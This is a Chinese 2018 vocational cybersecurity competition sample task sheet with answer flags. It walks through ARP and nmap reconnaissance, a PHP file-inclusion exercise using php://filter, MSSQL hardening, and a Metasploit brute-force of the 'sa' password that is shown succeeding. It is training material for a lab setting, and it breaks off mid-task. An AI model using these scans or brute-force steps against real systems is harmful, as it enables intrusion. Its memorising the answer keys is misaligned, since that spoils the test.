资源描述
2018年度全国职业技能大赛中职组“网络空间安全”赛项
江苏省竞赛任务书
(样题)
一、竞赛时间
9:00-12:00,共计3小时。
二、竞赛阶段简介
竞赛阶段
任务阶段
竞赛任务
竞赛时间
分值
第一阶段单兵模式系统渗透测试
任务1
ARP协议渗透测试
9:00-11:00
15
任务2
操作系统及应用程序扫描渗透测试
15
任务3
Web应用程序文件包含安全攻防
20
任务4
数据库安全加固
20
第二阶段分组对抗
系统加固
11:00-11:15
30
渗透测试
11:15-12:00
三、竞赛任务书内容
(一)拓扑图
(二)第一阶段任务书
任务1.ARP扫描渗透测试
任务环境说明:
ü 服务器场景:CentOS5.5
ü 服务器场景操作系统:CentOS5.5
1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;
Arping –c 5 x.x.x.x
2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;
Arping –c 5 x.x.x.x
root@kali:~# arping -c 5 192.168.28.122
ARPING 192.168.28.122 from 192.168.28.100 eth0
Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.017ms
Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 0.638ms
Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms
Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.590ms
Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms
Sent 5 probes (1 broadcast(s))
Received 5 response(s)
Flag:5
3. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;
msf > use auxiliary/scanner/discovery/arp_sweep
Flag:Auxiliary/scanner/discovery/arp_sweep
4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > run
[*] 192.168.28.122 appears to be up (VMware, Inc.).
[*] 192.168.28.2 appears to be up (VMware, Inc.).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Flag:completed
5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;
msf auxiliary(arp_sweep) > run
[*] 192.168.28.122 appears to be up (VMware, Inc.).
[*] 192.168.28.2 appears to be up (VMware, Inc.).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Flag:appears
6. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;
Flag:exploit or run
任务2.操作系统及应用程序扫描渗透测试
任务环境说明:
ü 服务器场景:CentOS5.5
ü 服务器场景操作系统:CentOS5.5
1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
Flag:Nmap –n –Sp x.x.x.x
2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;
root@kali:~# nmap -n -sP 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 19:59 EST
Nmap scan report for 192.168.28.122
Host is up (0.00069s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
Flag:up
3. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
root@kali:~# nmap -n -A 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:11 EST
Nmap scan report for 192.168.28.122
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)
|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 910/udp status
|_ 100024 1 913/tcp status
MAC Address: 00:0C:29:62:80:73 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.28.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
Flag:Nmap –n –A x.x.x.x
4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;
root@kali:~# nmap -n -A 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:11 EST
Nmap scan report for 192.168.28.122
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)
|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 910/udp status
|_ 100024 1 913/tcp status
MAC Address: 00:0C:29:62:80:73 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.28.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
Flag:seconds
5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
root@kali:~# nmap -O 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:13 EST
Nmap scan report for 192.168.28.122
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:62:80:73 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds
Flag:Nmap –O x.x.x.x
6. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;
Flag:Nmap –sV x.x.x.x
7. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;
root@kali:~# nmap -sV 192.168.28.122
Starting Nmap 7.40 ( https://nmap.org ) at 2017-12-10 20:17 EST
Nmap scan report for 192.168.28.122
Host is up (0.00014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
111/tcp open rpcbind 2 (RPC #100000)
MAC Address: 00:0C:29:62:80:73 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds
Flag:OpenSSH 4.3
任务3.Web应用程序文件包含安全攻防
任务环境说明:
ü 服务器场景名称:WebServ2003
ü 服务器场景安全操作系统:Microsoft Windows2003 Server
ü 服务器场景安装中间件:Apache2.2;
ü 服务器场景安装Web开发环境:Php6;
ü 服务器场景安装数据库:Microsoft SqlServer2000;
ü 服务器场景安装文本编辑器:EditPlus;
1. 访问WebServ2003服务器场景,"/"->"Display Uploaded's File Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;
2. 对该任务题目1页面注入点进行渗透测试,通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;
3. 对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;
4. 通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;
5. 进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);
6. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;
任务4.数据库安全加固
任务环境说明:
ü 服务器场景名称:WebServ2003
ü 服务器场景安全操作系统:Microsoft Windows2003 Server
ü 服务器场景安装中间件:Apache2.2;
ü 服务器场景安装Web开发环境:Php6;
ü 服务器场景安装数据库:Microsoft SqlServer2000;
ü 服务器场景安装文本编辑器:EditPlus;
1. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;
2. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;
C:\Documents and Settings\Administrator>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
TCP 192.168.28.131:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1434 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 192.168.28.131:123 *:*
UDP 192.168.28.131:137 *:*
UDP 192.168.28.131:138 *:*
Flag:LISTENING
3. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > run
[*] 192.168.28.131: - SQL Server information for 192.168.28.131:
[+] 192.168.28.131: - ServerName = SERVER
[+] 192.168.28.131: - InstanceName = MSSQLSERVER
[+] 192.168.28.131: - IsClustered = No
[+] 192.168.28.131: - Version = 8.00.194
[+] 192.168.28.131: - tcp = 1433
[+] 192.168.28.131: - np = \\SERVER\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
4. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set username sa
msf auxiliary(mssql_login) > set pass_file /usr/share/wordlists/metasploit/password.lst
msf auxiliary(mssql_login) > run
[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: )
[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Flag: completed
5. 通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并将渗透测试利用命令以及渗透测试平台run结果第1行回
展开阅读全文
浙ICP备2021020529号-1 | 浙B2-20240490 
